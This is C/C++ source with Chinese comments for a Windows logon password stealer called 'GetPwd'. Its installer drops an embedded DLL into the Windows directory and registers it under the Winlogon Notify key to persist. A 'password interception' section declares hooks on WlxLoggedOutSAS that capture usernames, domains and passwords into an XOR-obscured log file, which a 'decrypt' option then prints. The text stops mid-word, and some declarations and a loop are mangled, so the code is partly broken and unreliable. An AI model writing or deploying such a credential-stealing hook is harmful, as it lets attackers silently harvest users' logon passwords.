void dey()//解密
{
printf("/r/n请不要移动原密码文件!");
system("pause");
char buffer[10000];
ZeroMemory(buffer,10000);
char LogPath[255] = {0};
GetSystemDirectory( LogPath , MAX_PATH);
lstrcat( LogPath, "//pwd.txt");
HANDLE hfile = CreateFile(
LogPath,
GENERIC_READ,
FILE_SHARE_WRITE,
0,
OPEN_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
0);
if(!hfile)
{
printf("打开文件失败!");
return;
}
DWORD st;
int a=ReadFile(hfile,buffer,10000,&st,0);
if(!a)
{
printf("读取失败!");
return;
}
for(int i = 0;i {
buffer[i]=buffer[i]^3;
}
printf("解密内容为：/r/n%s",buffer);
return;
}
bool installed(); //判断是否已经安装
void installe() //安装函数
{
if(installed())
{
printf("已经安装过了!");
return;
}
HRSRC hResInfo;
HGLOBAL hResData;
DWORD dwSize, dwWritten;
LPBYTE p;
HANDLE hFile;
hResInfo = FindResource(NULL, MAKEINTRESOURCE(IDR_DLL1), "dll");
dwSize = SizeofResource(NULL, hResInfo);
hResData = LoadResource(NULL, hResInfo);
p = (LPBYTE)GlobalAlloc(GPTR, dwSize);
CopyMemory((LPVOID)p, (LPCVOID)LockResource(hResData), dwSize);//定位资源
char pfile[200];
GetWindowsDirectory(pfile, 200);
strcat(pfile,"//GetPwd.dll");//C:/WINDOWS/
hFile = CreateFile(pfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
WriteFile(hFile, (LPCVOID)p,dwSize, &dwWritten, NULL);
CloseHandle(hFile);
GlobalFree((HGLOBAL)p);
HKEY hkey;
if(ERROR_SUCCESS==RegCreateKey(HKEY_LOCAL_MACHINE,
"SOFTWARE//Microsoft//Windows NT//CurrentVersion//Winlogon//Notify//GetPwd//",
&hkey)
)
{
char * name3 ="dog";
RegSetValueEx(hkey,"dllname",0,REG_SZ,(const unsigned char *)pfile,strlen(pfile));
RegSetValueEx(hkey,"startup",0,REG_SZ,(const unsigned char *)name3,strlen("dog"));
printf("安装成功!");
}
else
{
printf("安装失败!");
return;
}
}
bool installed()
{
HKEY hkey;
char sz[256];
DWORD dwtype, sl = 256;
if(ERROR_SUCCESS != RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE//Microsoft//Windows NT//CurrentVersion//Winlogon//Notify//GetPwd",
NULL, KEY_ALL_ACCESS, &hkey) //打开失败，表示没有安装
)
{
RegCloseKey(hkey);
return false;
}
RegCloseKey(hkey);
return true;
}
void usag()//用法提示
{
printf("example:/r/n");
printf("/r/n Install: getpwd.exe installe");
printf("/r/n Decryp : getpwd.exe Decryp /r/n");
}
int main(int argc, char* argv[])
{
if(!lstrcmpi(argv[1],"installe"))//
{
installe();
return 0;
}
else if(!lstrcmpi(argv[1], "Decryp"))
{
dey();
return 0;
}
usag();
return 0;
}
密码截获
#define WLX_SAS_ACTION_LOGON (1)
DWORD WINAPI StartHook(LPVOID lpParameter);
typedef struct _WLX_MPR_NOTIFY_INFO {
PWSTR pszUserName;
PWSTR pszDomain;
PWSTR pszPassword;
PWSTR pszOldPassword;
} WLX_MPR_NOTIFY_INFO, * PWLX_MPR_NOTIFY_INFO;
typedef int (WINAPI* WlxLoggedOutSAS)(
//定义函数原型，以便将数据转发给系统
PVOID pWlxContext,
DWORD dwSasType,
PLUID pAuthenticationId,
PSIDpLogonSid,
PDWORD pdwOptions,
PHANDLE phToken,
PWLX_MPR_NOTIFY_INFOpNprNotifyInfo,
PVOID * pProfile
);
int WINAPI FunNewADDR(
PVOID pWlxContext,
DWORD dwSasType,
PLUID pAuthenticationId,
PSID pLogonSid,
PDWORD pdwOptions,
PHANDLE phToken,
PWLX_MPR_NOTIFY_INFO prNotifyInfo,
PVOID * pProfile);
//自定义接管WlxLoggedOutSAS的函数，形参保持一致
void WriteLog(
PWLX_MPR_NOTIFY_INFOpNprNotifyInfo
);//声明保存用户名密码函数原型
int WideToByte( PCHAR sz_target, PWSTR sz_source , int size_ansi);
void WriteCurrentTime();
void HookWlxLoggedOutSAS();
//执行HOOK
void UnHookWlxLoggedOutSAS();
//撤销HOOK
bo